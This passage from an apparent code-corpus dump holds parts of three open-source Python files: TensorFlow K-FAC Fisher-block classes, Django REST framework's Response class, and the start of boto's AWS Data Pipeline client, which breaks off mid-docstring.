"""Approximate damped Fisher-vector product.
Args:
vector: Tensor or 2-tuple of Tensors. if self._has_bias, Tensor of shape
[input_size, output_size] corresponding to layer's weights. If not, a
2-tuple of the former and a Tensor of shape [output_size] corresponding
to the layer's bias.
Returns:
Tensor of the same shape, corresponding to the Fisher-vector product.
"""
reshaped_vect = utils.layer_params_to_mat2d(vector)
reshaped_out = reshaped_vect * (self._factor.get_cov() + self._damping)
return utils.mat2d_to_layer_params(vector, reshaped_out)
def tensors_to_compute_grads(self):
"""Tensors to compute derivative of loss with respect to."""
return self._outputs
def register_additional_minibatch(self, inputs, outputs):
"""Registers an additional minibatch to the FisherBlock.
Args:
inputs: Tensor of shape [batch_size, input_size]. Inputs to the
matrix-multiply.
outputs: Tensor of shape [batch_size, output_size]. Layer preactivations.
"""
self._inputs.append(inputs)
self._outputs.append(outputs)
@property
def num_registered_minibatches(self):
result = len(self._inputs)
assert result == len(self._outputs)
return result
class ConvDiagonalFB(FisherBlock):
"""FisherBlock for convolutional layers using a diagonal approx.
Estimates the Fisher Information matrix's diagonal entries for a convolutional
layer. Unlike NaiveDiagonalFB this uses the low-variance "sum of squares"
estimator.
Let 'params' be a vector parameterizing a model and 'i' an arbitrary index
into it. We are interested in Fisher(params)[i, i]. This is,
Fisher(params)[i, i] = E[ v(x, y, params) v(x, y, params)^T ][i, i]
= E[ v(x, y, params)[i] ^ 2 ]
  Consider a convolutional layer in this model with (unshared) filter matrix
'w'. For an example image 'x' that produces layer inputs 'a' and output
preactivations 's',
v(x, y, w) = vec( sum_{loc} a_{loc} (d loss / d s_{loc})^T )
where 'loc' is a single (x, y) location in an image.
This FisherBlock tracks Fisher(params)[i, i] for all indices 'i' corresponding
to the layer's parameters 'w'.
"""
def __init__(self, layer_collection, params, strides, padding):
"""Creates a ConvDiagonalFB block.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
params: The parameters (Tensor or tuple of Tensors) of this layer. If
kernel alone, a Tensor of shape [kernel_height, kernel_width,
in_channels, out_channels]. If kernel and bias, a tuple of 2 elements
containing the previous and a Tensor of shape [out_channels].
strides: The stride size in this layer (1-D Tensor of length 4).
padding: The padding in this layer (e.g. "SAME").
"""
self._inputs = []
self._outputs = []
self._strides = tuple(strides) if isinstance(strides, list) else strides
self._padding = padding
self._has_bias = isinstance(params, (tuple, list))
fltr = params[0] if self._has_bias else params
self._filter_shape = tuple(fltr.shape.as_list())
super(ConvDiagonalFB, self).__init__(layer_collection)
def instantiate_factors(self, grads_list, damping):
# Concatenate inputs, grads_list into single Tensors.
inputs = _concat_along_batch_dim(self._inputs)
grads_list = tuple(_concat_along_batch_dim(grads) for grads in grads_list)
# Infer number of locations upon which convolution is applied.
inputs_shape = tuple(inputs.shape.as_list())
self._num_locations = (
inputs_shape[1] * inputs_shape[2] //
(self._strides[1] * self._strides[2]))
if NORMALIZE_DAMPING_POWER:
damping /= self._num_locations**NORMALIZE_DAMPING_POWER
self._damping = damping
self._factor = self._layer_collection.make_or_get_factor(
fisher_factors.ConvDiagonalFactor,
(inputs, grads_list, self._filter_shape, self._strides, self._padding,
self._has_bias))
def multiply_inverse(self, vector):
reshaped_vect = utils.layer_params_to_mat2d(vector)
reshaped_out = reshaped_vect / (self._factor.get_cov() + self._damping)
return utils.mat2d_to_layer_params(vector, reshaped_out)
def multiply(self, vector):
reshaped_vect = utils.layer_params_to_mat2d(vector)
reshaped_out = reshaped_vect * (self._factor.get_cov() + self._damping)
return utils.mat2d_to_layer_params(vector, reshaped_out)
def tensors_to_compute_grads(self):
return self._outputs
def register_additional_minibatch(self, inputs, outputs):
"""Registers an additional minibatch to the FisherBlock.
Args:
inputs: Tensor of shape [batch_size, height, width, input_size]. Inputs to
the convolution.
outputs: Tensor of shape [batch_size, height, width, output_size]. Layer
preactivations.
"""
self._inputs.append(inputs)
self._outputs.append(outputs)
@property
def num_registered_minibatches(self):
return len(self._inputs)
class KroneckerProductFB(FisherBlock):
"""A base class for FisherBlocks with separate input and output factors.
The Fisher block is approximated as a Kronecker product of the input and
output factors.
"""
def _register_damped_input_and_output_inverses(self, damping):
"""Registers damped inverses for both the input and output factors.
Sets the instance members _input_damping and _output_damping. Requires the
instance members _input_factor and _output_factor.
Args:
damping: The base damping factor (float or Tensor) for the damped inverse.
"""
self._input_damping, self._output_damping = _compute_pi_adjusted_damping(
self._input_factor.get_cov(),
self._output_factor.get_cov(),
damping**0.5)
self._input_factor.register_damped_inverse(self._input_damping)
self._output_factor.register_damped_inverse(self._output_damping)
@property
def _renorm_coeff(self):
"""Kronecker factor multiplier coefficient.
If this FisherBlock is represented as 'FB = c * kron(left, right)', then
this is 'c'.
Returns:
0-D Tensor.
"""
return 1.0
def multiply_inverse(self, vector):
left_factor_inv = self._input_factor.get_damped_inverse(self._input_damping)
right_factor_inv = self._output_factor.get_damped_inverse(
self._output_damping)
reshaped_vector = utils.layer_params_to_mat2d(vector)
reshaped_out = math_ops.matmul(left_factor_inv,
math_ops.matmul(reshaped_vector,
right_factor_inv))
if self._renorm_coeff != 1.0:
reshaped_out /= math_ops.cast(
self._renorm_coeff, dtype=reshaped_out.dtype)
return utils.mat2d_to_layer_params(vector, reshaped_out)
def multiply(self, vector):
left_factor = self._input_factor.get_cov()
right_factor = self._output_factor.get_cov()
reshaped_vector = utils.layer_params_to_mat2d(vector)
reshaped_out = (
math_ops.matmul(reshaped_vector, right_factor) +
self._output_damping * reshaped_vector)
reshaped_out = (
math_ops.matmul(left_factor, reshaped_out) +
self._input_damping * reshaped_out)
if self._renorm_coeff != 1.0:
reshaped_out *= math_ops.cast(
self._renorm_coeff, dtype=reshaped_out.dtype)
return utils.mat2d_to_layer_params(vector, reshaped_out)
def full_fisher_block(self):
"""Explicitly constructs the full Fisher block.
Used for testing purposes. (In general, the result may be very large.)
Returns:
The full Fisher block.
"""
left_factor = self._input_factor.get_cov()
right_factor = self._output_factor.get_cov()
return self._renorm_coeff * utils.kronecker_product(left_factor,
right_factor)
class FullyConnectedKFACBasicFB(KroneckerProductFB):
"""K-FAC FisherBlock for fully-connected (dense) layers.
This uses the Kronecker-factorized approximation from the original
K-FAC paper (https://arxiv.org/abs/1503.05671)
"""
def __init__(self, layer_collection, has_bias=False):
"""Creates a FullyConnectedKFACBasicFB block.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
has_bias: Whether the component Kronecker factors have an additive bias.
(Default: False)
"""
self._inputs = []
self._outputs = []
self._has_bias = has_bias
super(FullyConnectedKFACBasicFB, self).__init__(layer_collection)
def instantiate_factors(self, grads_list, damping):
"""Instantiate Kronecker Factors for this FisherBlock.
Args:
grads_list: List of list of Tensors. grads_list[i][j] is the
gradient of the loss with respect to 'outputs' from source 'i' and
tower 'j'. Each Tensor has shape [tower_minibatch_size, output_size].
damping: 0-D Tensor or float. 'damping' * identity is approximately added
to this FisherBlock's Fisher approximation.
"""
# TODO(b/68033310): Validate which of,
# (1) summing on a single device (as below), or
# (2) on each device in isolation and aggregating
# is faster.
inputs = _concat_along_batch_dim(self._inputs)
grads_list = tuple(_concat_along_batch_dim(grads) for grads in grads_list)
self._input_factor = self._layer_collection.make_or_get_factor( #
fisher_factors.FullyConnectedKroneckerFactor, #
((inputs,), self._has_bias))
self._output_factor = self._layer_collection.make_or_get_factor( #
fisher_factors.FullyConnectedKroneckerFactor, #
(grads_list,))
self._register_damped_input_and_output_inverses(damping)
def tensors_to_compute_grads(self):
return self._outputs
def register_additional_minibatch(self, inputs, outputs):
"""Registers an additional minibatch to the FisherBlock.
Args:
inputs: Tensor of shape [batch_size, input_size]. Inputs to the
matrix-multiply.
outputs: Tensor of shape [batch_size, output_size]. Layer preactivations.
"""
self._inputs.append(inputs)
self._outputs.append(outputs)
@property
def num_registered_minibatches(self):
return len(self._inputs)
class ConvKFCBasicFB(KroneckerProductFB):
"""FisherBlock for 2D convolutional layers using the basic KFC approx.
Estimates the Fisher Information matrix's block for a convolutional
layer.
Consider a convolutional layer in this model with (unshared) filter matrix
'w'. For a minibatch that produces inputs 'a' and output preactivations 's',
this FisherBlock estimates,
F(w) = #locations * kronecker(E[flat(a) flat(a)^T],
E[flat(ds) flat(ds)^T])
where
ds = (d / ds) log p(y | x, w)
#locations = number of (x, y) locations where 'w' is applied.
where the expectation is taken over all examples and locations and flat()
concatenates an array's leading dimensions.
See equation 23 in https://arxiv.org/abs/1602.01407 for details.
"""
def __init__(self, layer_collection, params, strides, padding):
"""Creates a ConvKFCBasicFB block.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
params: The parameters (Tensor or tuple of Tensors) of this layer. If
kernel alone, a Tensor of shape [kernel_height, kernel_width,
in_channels, out_channels]. If kernel and bias, a tuple of 2 elements
containing the previous and a Tensor of shape [out_channels].
strides: The stride size in this layer (1-D Tensor of length 4).
padding: The padding in this layer (1-D Tensor of length 4).
"""
self._inputs = []
self._outputs = []
self._strides = tuple(strides) if isinstance(strides, list) else strides
self._padding = padding
self._has_bias = isinstance(params, (tuple, list))
fltr = params[0] if self._has_bias else params
self._filter_shape = tuple(fltr.shape.as_list())
super(ConvKFCBasicFB, self).__init__(layer_collection)
def instantiate_factors(self, grads_list, damping):
# TODO(b/68033310): Validate which of,
# (1) summing on a single device (as below), or
# (2) on each device in isolation and aggregating
# is faster.
inputs = _concat_along_batch_dim(self._inputs)
grads_list = tuple(_concat_along_batch_dim(grads) for grads in grads_list)
# Infer number of locations upon which convolution is applied.
self._num_locations = _num_conv_locations(inputs.shape.as_list(),
self._strides)
self._input_factor = self._layer_collection.make_or_get_factor(
fisher_factors.ConvInputKroneckerFactor,
(inputs, self._filter_shape, self._strides, self._padding,
self._has_bias))
self._output_factor = self._layer_collection.make_or_get_factor(
fisher_factors.ConvOutputKroneckerFactor, (grads_list,))
if NORMALIZE_DAMPING_POWER:
damping /= self._num_locations**NORMALIZE_DAMPING_POWER
self._damping = damping
self._register_damped_input_and_output_inverses(damping)
@property
def _renorm_coeff(self):
return self._num_locations
def tensors_to_compute_grads(self):
return self._outputs
def register_additional_minibatch(self, inputs, outputs):
"""Registers an additional minibatch to the FisherBlock.
Args:
inputs: Tensor of shape [batch_size, height, width, input_size]. Inputs to
the convolution.
outputs: Tensor of shape [batch_size, height, width, output_size]. Layer
preactivations.
"""
self._inputs.append(inputs)
self._outputs.append(outputs)
@property
def num_registered_minibatches(self):
return len(self._inputs)
def _concat_along_batch_dim(tensor_list):
"""Concatenate tensors along batch (first) dimension.
Args:
tensor_list: list of Tensors or list of tuples of Tensors.
Returns:
Tensor or tuple of Tensors.
Raises:
ValueError: If 'tensor_list' is empty.
"""
if not tensor_list:
raise ValueError(
"Cannot concatenate Tensors if there are no Tensors to concatenate.")
if isinstance(tensor_list[0], (tuple, list)):
# [(tensor1a, tensor1b),
# (tensor2a, tensor2b), ...] --> (tensor_a, tensor_b)
return tuple(
array_ops.concat(tensors, axis=0) for tensors in zip(*tensor_list))
else:
# [tensor1, tensor2] --> tensor
return array_ops.concat(tensor_list, axis=0)
def _num_conv_locations(input_shape, strides):
"""Returns the number of locations a Conv kernel is applied to."""
return input_shape[1] * input_shape[2] // (strides[1] * strides[2])
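# Illustrative example (not part of this module): for an NHWC input of shape
# [32, 28, 28, 3] with strides [1, 2, 2, 1], the kernel is applied at
# (28 * 28) // (2 * 2) == 196 spatial locations:
#
#   assert _num_conv_locations([32, 28, 28, 3], [1, 2, 2, 1]) == 196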
class FullyConnectedMultiIndepFB(KroneckerProductFB):
"""FisherBlock for fully-connected layers that share parameters.
"""
def __init__(self, layer_collection, inputs, outputs, has_bias=False):
"""Creates a FullyConnectedMultiIndepFB block.
Args:
layer_collection: LayerCollection instance.
inputs: list or tuple of Tensors. Each Tensor has shape [batch_size,
inputs_size].
outputs: list or tuple of Tensors. Each Tensor has shape [batch_size,
outputs_size].
has_bias: bool. If True, estimates Fisher with respect to a bias
parameter as well as the layer's parameters.
"""
assert len(inputs) == len(outputs)
# We need to make sure inputs and outputs are tuples and not lists so that
# they get hashed by layer_collection.make_or_get_factor properly.
self._inputs = tuple(inputs)
self._outputs = tuple(outputs)
self._has_bias = has_bias
self._num_uses = len(inputs)
super(FullyConnectedMultiIndepFB, self).__init__(layer_collection)
@property
def num_registered_minibatches(self):
# TODO(b/69411207): Add support for registering additional minibatches.
return 1
def instantiate_factors(self, grads_list, damping):
self._input_factor = self._layer_collection.make_or_get_factor(
fisher_factors.FullyConnectedMultiKF,
((self._inputs,), self._has_bias))
self._output_factor = self._layer_collection.make_or_get_factor(
fisher_factors.FullyConnectedMultiKF, (grads_list,))
if NORMALIZE_DAMPING_POWER:
damping /= self._num_uses**NORMALIZE_DAMPING_POWER
self._register_damped_input_and_output_inverses(damping)
@property
def _renorm_coeff(self):
return self._num_uses
def tensors_to_compute_grads(self):
return self._outputs
def num_inputs(self):
return len(self._inputs)
class SeriesFBApproximation(enum.IntEnum):
"""See FullyConnectedSeriesFB.__init__ for description and usage."""
option1 = 1
option2 = 2
class FullyConnectedSeriesFB(FisherBlock):
"""FisherBlock for fully-connected layers that share parameters across time.
See the following preprint for details:
https://openreview.net/pdf?id=HyMTkQZAb
See the end of the appendix of the paper for a pseudo-code of the
algorithm being implemented by multiply_inverse here. Note that we are
using pre-computed versions of certain matrix-matrix products to speed
things up. This is explicitly explained wherever it is done.
"""
def __init__(self,
layer_collection,
inputs,
outputs,
has_bias=False,
option=SeriesFBApproximation.option2):
"""Constructs a new `FullyConnectedSeriesFB`.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
inputs: List of tensors of shape [batch_size, input_size].
Inputs to the layer.
outputs: List of tensors of shape [batch_size, output_size].
Outputs of the layer (before activations).
has_bias: Whether the layer includes a bias parameter.
option: A `SeriesFBApproximation` specifying the simplifying assumption
to be used in this block. `option1` approximates the cross-covariance
over time as a symmetric matrix, while `option2` makes
the assumption that training sequences are infinitely long. See section
3.5 of the paper for more details.
"""
assert len(inputs) == len(outputs)
# We need to make sure inputs and outputs are tuples and not lists so that
# they get hashed by layer_collection.make_or_get_factor properly.
self._inputs = tuple(inputs)
self._outputs = tuple(outputs)
self._has_bias = has_bias
self._num_timesteps = len(inputs)
self._option = option
super(FullyConnectedSeriesFB, self).__init__(layer_collection)
@property
def num_registered_minibatches(self):
# TODO(b/69411207): Add support for registering additional minibatches.
return 1
def instantiate_factors(self, grads_list, damping):
self._input_factor = self._layer_collection.make_or_get_factor(
fisher_factors.FullyConnectedMultiKF, ((self._inputs,), self._has_bias))
self._output_factor = self._layer_collection.make_or_get_factor(
fisher_factors.FullyConnectedMultiKF, (grads_list,))
if NORMALIZE_DAMPING_POWER:
damping /= self._num_timesteps**NORMALIZE_DAMPING_POWER
self._damping_input, self._damping_output = _compute_pi_adjusted_damping(
self._input_factor.get_cov(),
self._output_factor.get_cov(),
damping**0.5)
if self._option == SeriesFBApproximation.option1:
self._input_factor.register_option1quants(self._damping_input)
self._output_factor.register_option1quants(self._damping_output)
elif self._option == SeriesFBApproximation.option2:
self._input_factor.register_option2quants(self._damping_input)
self._output_factor.register_option2quants(self._damping_output)
else:
raise ValueError(
"Unrecognized FullyConnectedSeriesFB approximation: {}".format(
self._option))
def multiply_inverse(self, vector):
# pylint: disable=invalid-name
Z = utils.layer_params_to_mat2d(vector)
# Derivations were done for "batch_dim==1" case so we need to convert to
# that orientation:
Z = array_ops.transpose(Z)
if self._option == SeriesFBApproximation.option1:
# Note that L_A = A0^(-1/2) * U_A and L_G = G0^(-1/2) * U_G.
L_A, psi_A = self._input_factor.get_option1quants(self._damping_input)
L_G, psi_G = self._output_factor.get_option1quants(self._damping_output)
def gamma(x):
# We are assuming that each case has the same number of time-steps.
# If this stops being the case one shouldn't simply replace this T
# with its average value. Instead, one needs to go back to the
# definition of the gamma function from the paper.
T = self._num_timesteps
return (1 - x)**2 / (T * (1 - x**2) - 2 * x * (1 - x**T))
# Y = gamma( psi_G*psi_A^T ) (computed element-wise)
# Even though Y is Z-independent we are recomputing it from the psi's
# each time, since Y depends on both A and G quantities, and it is relatively
# cheap to compute.
Y = gamma(array_ops.reshape(psi_G, [int(psi_G.shape[0]), -1]) * psi_A)
# Z = L_G^T * Z * L_A
# This is equivalent to the following computation from the original
# pseudo-code:
# Z = G0^(-1/2) * Z * A0^(-1/2)
# Z = U_G^T * Z * U_A
Z = math_ops.matmul(L_G, math_ops.matmul(Z, L_A), transpose_a=True)
# Z = Z .* Y
Z *= Y
# Z = L_G * Z * L_A^T
# This is equivalent to the following computation from the original
# pseudo-code:
# Z = U_G * Z * U_A^T
# Z = G0^(-1/2) * Z * A0^(-1/2)
Z = math_ops.matmul(L_G, math_ops.matmul(Z, L_A, transpose_b=True))
elif self._option == SeriesFBApproximation.option2:
# Note that P_A = A_1^T * A_0^(-1) and P_G = G_1^T * G_0^(-1),
# and K_A = A_0^(-1/2) * E_A and K_G = G_0^(-1/2) * E_G.
P_A, K_A, mu_A = self._input_factor.get_option2quants(self._damping_input)
P_G, K_G, mu_G = self._output_factor.get_option2quants(
self._damping_output)
# Our approach differs superficially from the pseudo-code in the paper
# in order to reduce the total number of matrix-matrix multiplies.
# In particular, the first three computations in the pseudo code are
# Z = G0^(-1/2) * Z * A0^(-1/2)
# Z = Z - hPsi_G^T * Z * hPsi_A
# Z = E_G^T * Z * E_A
# Noting that hPsi = C0^(-1/2) * C1 * C0^(-1/2), so that
# C0^(-1/2) * hPsi = C0^(-1) * C1 * C0^(-1/2) = P^T * C0^(-1/2)
# the entire computation can be written as
# Z = E_G^T * (G0^(-1/2) * Z * A0^(-1/2)
# - hPsi_G^T * G0^(-1/2) * Z * A0^(-1/2) * hPsi_A) * E_A
# = E_G^T * (G0^(-1/2) * Z * A0^(-1/2)
# - G0^(-1/2) * P_G * Z * P_A^T * A0^(-1/2)) * E_A
# = E_G^T * G0^(-1/2) * Z * A0^(-1/2) * E_A
# - E_G^T* G0^(-1/2) * P_G * Z * P_A^T * A0^(-1/2) * E_A
# = K_G^T * Z * K_A - K_G^T * P_G * Z * P_A^T * K_A
# This final expression is computed by the following two lines:
# Z = Z - P_G * Z * P_A^T
Z -= math_ops.matmul(P_G, math_ops.matmul(Z, P_A, transpose_b=True))
# Z = K_G^T * Z * K_A
Z = math_ops.matmul(K_G, math_ops.matmul(Z, K_A), transpose_a=True)
# Z = Z ./ (1*1^T - mu_G*mu_A^T)
# Be careful with the outer product. We don't want to accidentally
# make it an inner-product instead.
tmp = 1.0 - array_ops.reshape(mu_G, [int(mu_G.shape[0]), -1]) * mu_A
# Prevent some numerical issues by setting any 0.0 eigs to 1.0
tmp += 1.0 * math_ops.cast(math_ops.equal(tmp, 0.0), dtype=tmp.dtype)
Z /= tmp
# We now perform the transpose/reverse version of the operations
# derived above, whose derivation from the original pseudo-code is
# analogous.
# Z = K_G * Z * K_A^T
Z = math_ops.matmul(K_G, math_ops.matmul(Z, K_A, transpose_b=True))
# Z = Z - P_G^T * Z * P_A
Z -= math_ops.matmul(P_G, math_ops.matmul(Z, P_A), transpose_a=True)
# Normalize: Z = (1/E[T]) * Z
# Note that this normalization is done because we compute the statistics
# by averaging, not summing, over time. (And the gradient is presumably
# summed over time, not averaged, and thus their scales are different.)
Z /= math_ops.cast(self._num_timesteps, Z.dtype)
# Convert back to the "batch_dim==0" orientation.
Z = array_ops.transpose(Z)
return utils.mat2d_to_layer_params(vector, Z)
# pylint: enable=invalid-name
def multiply(self, vector):
raise NotImplementedError
def tensors_to_compute_grads(self):
return self._outputs
def num_inputs(self):
return len(self._inputs)
| apache-2.0 |
agconti/njode | env/lib/python2.7/site-packages/rest_framework/response.py | 5 | 3150 | """
The Response class in REST framework is similar to HTTPResponse, except that
it is initialized with unrendered data, instead of a pre-rendered string.
The appropriate renderer is called during Django's template response rendering.
"""
from __future__ import unicode_literals
from django.core.handlers.wsgi import STATUS_CODE_TEXT
from django.template.response import SimpleTemplateResponse
from django.utils import six
class Response(SimpleTemplateResponse):
"""
An HttpResponse that allows its data to be rendered into
arbitrary media types.
"""
def __init__(self, data=None, status=None,
template_name=None, headers=None,
exception=False, content_type=None):
"""
Alters the init arguments slightly.
For example, drop 'template_name', and instead use 'data'.
Setting 'renderer' and 'media_type' will typically be deferred,
for example being set automatically by the `APIView`.
"""
super(Response, self).__init__(None, status=status)
self.data = data
self.template_name = template_name
self.exception = exception
self.content_type = content_type
if headers:
for name, value in six.iteritems(headers):
self[name] = value
@property
def rendered_content(self):
renderer = getattr(self, 'accepted_renderer', None)
media_type = getattr(self, 'accepted_media_type', None)
context = getattr(self, 'renderer_context', None)
assert renderer, ".accepted_renderer not set on Response"
assert media_type, ".accepted_media_type not set on Response"
assert context, ".renderer_context not set on Response"
context['response'] = self
charset = renderer.charset
content_type = self.content_type
if content_type is None and charset is not None:
content_type = "{0}; charset={1}".format(media_type, charset)
elif content_type is None:
content_type = media_type
self['Content-Type'] = content_type
ret = renderer.render(self.data, media_type, context)
if isinstance(ret, six.text_type):
assert charset, (
'renderer returned unicode, and did not specify '
'a charset value.'
)
return bytes(ret.encode(charset))
if not ret:
del self['Content-Type']
return ret
@property
def status_text(self):
"""
Returns reason text corresponding to our HTTP response status code.
Provided for convenience.
"""
# TODO: Deprecate and use a template tag instead
# TODO: Status code text for RFC 6585 status codes
return STATUS_CODE_TEXT.get(self.status_code, '')
def __getstate__(self):
"""
Remove attributes from the response that shouldn't be cached
"""
state = super(Response, self).__getstate__()
for key in ('accepted_renderer', 'renderer_context', 'data'):
if key in state:
del state[key]
return state
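# Illustrative usage sketch (hypothetical view, not part of rest_framework):
# a view returns a Response holding unrendered data; the framework sets
# accepted_renderer / accepted_media_type / renderer_context during content
# negotiation before rendered_content is evaluated.
#
#   from rest_framework.views import APIView
#   from rest_framework.response import Response
#
#   class PingView(APIView):
#       def get(self, request, format=None):
#           return Response({'ping': 'pong'}, status=200)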
| bsd-3-clause |
pymedusa/Medusa | ext/boto/datapipeline/layer1.py | 148 | 29022 | # Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import boto
from boto.compat import json
from boto.connection import AWSQueryConnection
from boto.regioninfo import RegionInfo
from boto.exception import JSONResponseError
from boto.datapipeline import exceptions
class DataPipelineConnection(AWSQueryConnection):
"""
This is the AWS Data Pipeline API Reference . This guide provides
descriptions and samples of the AWS Data Pipeline API.
AWS Data Pipeline is a web service that configures and manages a
data-driven workflow called a pipeline. AWS Data Pipeline handles
the details of scheduling and ensuring that data dependencies are
met so your application can focus on processing the data.
The AWS Data Pipeline API implements two main sets of
functionality. The first set of actions configure the pipeline in
the web service. You call these actions to create a pipeline and
define data sources, schedules, dependencies, and the transforms
to be performed on the data.
The second set of actions are used by a task runner application
that calls the AWS Data Pipeline API to receive the next task
ready for processing. The logic for performing the task, such as
querying the data, running data analysis, or converting the data
from one format to another, is contained within the task runner.
The task runner performs the task assigned to it by the web
service, reporting progress to the web service as it does so. When
the task is done, the task runner reports the final success or
failure of the task to the web service.
AWS Data Pipeline provides an open-source implementation of a task
runner called AWS Data Pipeline Task Runner. AWS Data Pipeline
Task Runner provides logic for common data management scenarios,
such as performing database queries and running data analysis
using Amazon Elastic MapReduce (Amazon EMR). You can use AWS Data
Pipeline Task Runner as your task runner, or you can write your
own task runner to provide custom data management.
The AWS Data Pipeline API uses the Signature Version 4 protocol
for signing requests. For more information about how to sign a
request with this protocol, see `Signature Version 4 Signing
Process`_. In the code examples in this reference, the Signature
Version 4 Request parameters are represented as AuthParams.
"""
APIVersion = "2012-10-29"
DefaultRegionName = "us-east-1"
DefaultRegionEndpoint = "datapipeline.us-east-1.amazonaws.com"
ServiceName = "DataPipeline"
TargetPrefix = "DataPipeline"
ResponseError = JSONResponseError
_faults = {
"PipelineDeletedException": exceptions.PipelineDeletedException,
"InvalidRequestException": exceptions.InvalidRequestException,
"TaskNotFoundException": exceptions.TaskNotFoundException,
"PipelineNotFoundException": exceptions.PipelineNotFoundException,
"InternalServiceError": exceptions.InternalServiceError,
}
def __init__(self, **kwargs):
region = kwargs.pop('region', None)
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint)
kwargs['host'] = region.endpoint
super(DataPipelineConnection, self).__init__(**kwargs)
self.region = region
def _required_auth_capability(self):
return ['hmac-v4']
def activate_pipeline(self, pipeline_id):
"""
Validates a pipeline and initiates processing. If the pipeline
does not pass validation, activation fails.
Call this action to start processing pipeline tasks of a
pipeline you've created using the CreatePipeline and
PutPipelineDefinition actions. A pipeline cannot be modified
after it has been successfully activated.
:type pipeline_id: string
:param pipeline_id: The identifier of the pipeline to activate.
"""
params = {'pipelineId': pipeline_id, }
return self.make_request(action='ActivatePipeline',
body=json.dumps(params))
def create_pipeline(self, name, unique_id, description=None):
"""
Creates a new empty pipeline. When this action succeeds, you
can then use the PutPipelineDefinition action to populate the
pipeline.
:type name: string
:param name: The name of the new pipeline. You can use the same name
for multiple pipelines associated with your AWS account, because
AWS Data Pipeline assigns each new pipeline a unique pipeline
identifier.
:type unique_id: string
:param unique_id: A unique identifier that you specify. This identifier
is not the same as the pipeline identifier assigned by AWS Data
Pipeline. You are responsible for defining the format and ensuring
the uniqueness of this identifier. You use this parameter to ensure
idempotency during repeated calls to CreatePipeline. For example,
if the first call to CreatePipeline does not return a clear
success, you can pass in the same unique identifier and pipeline
name combination on a subsequent call to CreatePipeline.
CreatePipeline ensures that if a pipeline already exists with the
same name and unique identifier, a new pipeline will not be
created. Instead, you'll receive the pipeline identifier from the
previous attempt. The uniqueness of the name and unique identifier
combination is scoped to the AWS account or IAM user credentials.
:type description: string
:param description: The description of the new pipeline.
"""
params = {'name': name, 'uniqueId': unique_id, }
if description is not None:
params['description'] = description
return self.make_request(action='CreatePipeline',
body=json.dumps(params))
def delete_pipeline(self, pipeline_id):
"""
Permanently deletes a pipeline, its pipeline definition and
its run history. You cannot query or restore a deleted
pipeline. AWS Data Pipeline will attempt to cancel instances
associated with the pipeline that are currently being
processed by task runners. Deleting a pipeline cannot be
undone.
To temporarily pause a pipeline instead of deleting it, call
SetStatus with the status set to Pause on individual
components. Components that are paused by SetStatus can be
resumed.
:type pipeline_id: string
:param pipeline_id: The identifier of the pipeline to be deleted.
"""
params = {'pipelineId': pipeline_id, }
return self.make_request(action='DeletePipeline',
body=json.dumps(params))
def describe_objects(self, object_ids, pipeline_id, marker=None,
evaluate_expressions=None):
"""
Returns the object definitions for a set of objects associated
with the pipeline. Object definitions are composed of a set of
fields that define the properties of the object.
:type pipeline_id: string
:param pipeline_id: Identifier of the pipeline that contains the object
definitions.
:type object_ids: list
:param object_ids: Identifiers of the pipeline objects that contain the
definitions to be described. You can pass as many as 25 identifiers
in a single call to DescribeObjects.
:type evaluate_expressions: boolean
:param evaluate_expressions: Indicates whether any expressions in the
object should be evaluated when the object descriptions are
returned.
:type marker: string
:param marker: The starting point for the results to be returned. The
first time you call DescribeObjects, this value should be empty. As
long as the action returns `HasMoreResults` as `True`, you can call
DescribeObjects again and pass the marker value from the response
to retrieve the next set of results.
"""
params = {
'pipelineId': pipeline_id,
'objectIds': object_ids,
}
if evaluate_expressions is not None:
params['evaluateExpressions'] = evaluate_expressions
if marker is not None:
params['marker'] = marker
return self.make_request(action='DescribeObjects',
body=json.dumps(params))
def describe_pipelines(self, pipeline_ids):
"""
Retrieve metadata about one or more pipelines. The information
retrieved includes the name of the pipeline, the pipeline
identifier, its current state, and the user account that owns
the pipeline. Using account credentials, you can retrieve
metadata about pipelines that you or your IAM users have
created. If you are using an IAM user account, you can
retrieve metadata about only those pipelines you have read
permission for.
To retrieve the full pipeline definition instead of metadata
about the pipeline, call the GetPipelineDefinition action.
:type pipeline_ids: list
:param pipeline_ids: Identifiers of the pipelines to describe. You can
pass as many as 25 identifiers in a single call to
DescribePipelines. You can obtain pipeline identifiers by calling
ListPipelines.
"""
params = {'pipelineIds': pipeline_ids, }
return self.make_request(action='DescribePipelines',
body=json.dumps(params))
def evaluate_expression(self, pipeline_id, expression, object_id):
"""
Evaluates a string in the context of a specified object. A
task runner can use this action to evaluate SQL queries stored
in Amazon S3.
:type pipeline_id: string
:param pipeline_id: The identifier of the pipeline.
:type object_id: string
:param object_id: The identifier of the object.
:type expression: string
:param expression: The expression to evaluate.
"""
params = {
'pipelineId': pipeline_id,
'objectId': object_id,
'expression': expression,
}
return self.make_request(action='EvaluateExpression',
body=json.dumps(params))
def get_pipeline_definition(self, pipeline_id, version=None):
"""
Returns the definition of the specified pipeline. You can call
GetPipelineDefinition to retrieve the pipeline definition you
provided using PutPipelineDefinition.
:type pipeline_id: string
:param pipeline_id: The identifier of the pipeline.
:type version: string
